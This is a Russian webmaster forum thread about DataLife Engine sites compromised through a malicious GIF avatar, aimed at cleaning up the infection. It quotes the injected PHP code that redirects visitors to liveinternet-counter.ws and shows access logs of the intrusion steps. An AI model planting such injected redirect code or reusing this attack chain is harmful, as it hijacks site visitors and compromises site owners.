- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
А как найти зараженную гифку в папке с автарками? Скопилось порядка 30.000 фото разных форматов, как понять, что конкретно она заражена? Есть какой-нибудь общий признак. Спасибо
А как найти зараженную гифку в папке с автарками? Скопилось порядка 30.000 фото разных форматов, как понять, что конкретно она заражена? Есть какой-нибудь общий признак. Спасибо
Её можно и не найти, т.к картинка может удаляться с сервера после срабатывания...
Если нужно найти и удалить "заразу" пишите в ЛС.
Спасибо вам большое! Я бы искал еще дольше, но благодаря вам нашел быстро!🍿
Кстати, У меня тоже все заплатки были установлены. 🙅
В основном (часто), вставки кода от статусес.вс и т.п. находятся в:
корне сайта, файлы: .htaccess и index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Еще смотрите в папке language/Russian/website.lng туда тоже вставляется. Только для чего.. :)
Сегодня тоже обнаружил взлом сайта. Судя по изменённым файлам всё началось 6 февраля. Версия движка 9.3 + патчи. Помимо всего, что здесь описано так же обнаружил код Линкфида у себя на сайте.
Сегодня тоже обнаружил взлом сайта. Судя по изменённым файлам всё началось 6 февраля. Версия движка 9.3 + патчи. Помимо всего, что здесь описано так же обнаружил код Линкфида у себя на сайте.
Не всегда сам движок виноват взломе! Тут нужно проверять и делать анализ.
В основном (часто), вставки кода от статусес.вс и т.п. находятся в:
корне сайта, файлы: .htaccess и index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Еще смотрите в папке language/Russian/website.lng туда тоже вставляется. Только для чего.. :)
if(!empty($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['dle_user_hash'])){$url = @parse_url($_SERVER['HTTP_REFERER']);
if(!empty($url['host']) && $url['host'] != $_SERVER['HTTP_HOST']){
if(!isset($_COOKIE['dle_user_id']) && rand(1,3) == 2){
setcookie("dle_user_hash", md5(uniqid()), time()+(365*24*60*60), "/", $url['host'], false, true);
@header("Location: http://liveinternet-counter.ws");
}
}
}
теперь мошенник использует немного другой код ☝
if(!empty($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['dle_user_hash'])){$url = @parse_url($_SERVER['HTTP_REFERER']);
if(!empty($url['host']) && $url['host'] != $_SERVER['HTTP_HOST']){
if(!isset($_COOKIE['dle_user_id']) && rand(1,3) == 2){
setcookie("dle_user_hash", md5(uniqid()), time()+(365*24*60*60), "/", $url['host'], false, true);
@header("Location: http://liveinternet-counter.ws");
}
}
}
теперь мошенник использует немного другой код ☝
Да, у меня тоже вчера редиректило на liveinternet-counter.ws; я так понял что редирект происходил через какой то промежуток времени. У кого было сто то подобное - напишите пожалуйста, где искать заразу и как проникает злоумышленник?
Всем добрый день!!! Присоединяюсь к сообществу, поскольку вчера весь вечер потратил на прочтение всех 40-ка страниц темы и на решение проблемы. Всем спасибо за советы, помогли. Кстати у меня такого пользователя на сайте нету, заражен был где-то также в январе приблизительно, вчера только руки дошли... Не думал даже что все настолько масштабно.
Такой вопрос, сайты ломаются только те, которые на VPS или на хостинге тоже? Ато у меня сайт на впс пострадал, а тот, который на хостинге пока не тронут. Еще такой вопрос, я так понимаю, как работает эта славноизвестная гифка пока никому не ясно? А можно ли бекапнуть эту гифку после того, как она была удалена с сайта? Или это из раздела фантастики? )))) Еще раз всем спасибо за помощь!!!
Такой вопрос, сайты ломаются только те, которые на VPS или на хостинге тоже?
Ломают и те и те. Вчера удалял эту заразу со своего сайта.
Может, кому пригодится инфа.
Вчера были взломаны 3 сайта:
Порядок действий взломщика следующий:
3.89.222.117 - - [07/Apr/2013:14:32:17 +0400] "POST /index.php?subaction=userinfo&user=freshorangejuice HTTP/1.0" 200 25919 "-" "-"
93.89.222.117 - - [07/Apr/2013:14:32:18 +0400] "GET /index.php?subaction=userinfo&user=freshorangejuice HTTP/1.0" 200 25919 "http://www.site.net/index.php?subaction=userinfo&user=freshorangejuice" "-"
93.89.222.117 - - [07/Apr/2013:14:32:20 +0400] "POST /index.php?subaction=userinfo&user=freshorangejuice HTTP/1.0" 200 25908 "http://www.site.net/index.php?subaction=userinfo&user=freshorangejuice" "-"
93.89.222.117 - - [07/Apr/2013:14:32:21 +0400] "HEAD /uploads/fotos/foto_101.gif HTTP/1.1" 200 0 "http://www.site.net/index.php?subaction=userinfo&user=freshorangejuice" "-"
93.89.222.117 - - [07/Apr/2013:14:32:21 +0400] "POST /engine/ajax/pm.php HTTP/1.0" 200 1907 "http://www.site.net/uploads/fotos/foto_101.gif" "-"
93.89.222.117 - - [07/Apr/2013:14:32:22 +0400] "GET /index.php?subaction=userinfo&user=freshorangejuice HTTP/1.0" 200 25901 "http://www.site.net/engine/ajax/pm.php" "-"
93.89.222.117 - - [07/Apr/2013:14:32:23 +0400] "POST /index.php?subaction=userinfo&user=freshorangejuice HTTP/1.0" 200 25910 "http://www.site.net/index.php?subaction=userinfo&user=freshorangejuice" "-"
Что это означает:
1. Бот регистрируется как пользователь сайта.
2. После регистрации загружает аватар.
3. Через интерфейс отправки приватных сообщений ВЫПОЛНЯЕТ код, загруженный под видом аватара.
4. Удаляет аватар.
Модифицируются именно файлы конфигурации, потому, что на них есть права на запись - 666.
В данной ситуации необходимо срочно запретить загрузку пользователями аватаров и провести обновления DLE.
Кстати, из официальных источников по этой теме: http://dle-news.ru/bags/
"...А также был изменен алгоритм загрузки картинок и автаров, который больше не позволяет использование анимированных картинок .gif. Все загружаемые анимированные картинки будут выводится в виде статических картинок. Данная мера является вынужденной и необходимой, в связи с рядом ограничений формата gif, который не позволяет в достаточной мере отфильтровать вредный код в картинках, единственным эффективным способом является только снятие поддержки анимации в данных картинках."